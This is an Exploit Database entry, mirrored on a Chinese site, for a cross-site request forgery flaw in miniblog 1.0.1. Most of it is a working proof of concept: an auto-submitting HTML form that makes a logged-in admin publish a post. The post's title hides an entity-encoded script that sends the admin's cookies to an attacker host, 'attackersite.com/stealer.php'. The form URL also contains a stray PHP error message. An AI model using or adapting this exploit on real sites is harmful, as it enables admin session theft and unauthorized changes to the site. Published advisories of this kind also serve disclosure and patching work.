miniblog 1.0.1 – Cross-Site Request Forgery (Add New Post)

• Exploit Database
• 21 阅读

• 作者： Besim
  日期： 2016-10-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40480/

• # Exploit Title :miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
  # Author : Besim
  # Google Dork :
  # Date : 09/10/2016
  # Type : webapps
  # Platform : PHP
  # Vendor Homepage :http://www.spyka.net/scripts/php/miniblog
  # Software link :
  http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
  
  
  Description (admin login required) : 
  
  miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
  edit article in the sections
  
  Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
  
  Dangerous point : if used with XSS can be steal on the admin's cookie information.
  
  
  *############### CSRF PoC ###############*
  
  
  <html> <!-- CSRF PoC --> <body> <form action="
  http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
  method="POST"> <input type="hidden" name="data&#91;post&#95;title&#93;"
  value="<script>location&#46;href&#32;&#61;&#32;â&#128;&#152;http&#58;&#47;&#47;www&#46;attackersite&#46;com&#47;stealer&#46;php&#63;cookie&#61;â&#128;&#153;&#43;document&#46;cookie&#59;<&#47;script>"
  /> <input type="hidden" name="data&#91;post&#95;content&#93;"
  value="tester" /> <input type="hidden" name="data&#91;published&#93;"
  value="1" /> <input type="hidden" name="miniblog&#95;PostBack" value="Add"
  /> <input type="submit" value="Submit request" /> </form> <script>
  document.forms[0].submit(); </script> </body> </html>
  
  
  
  ########################################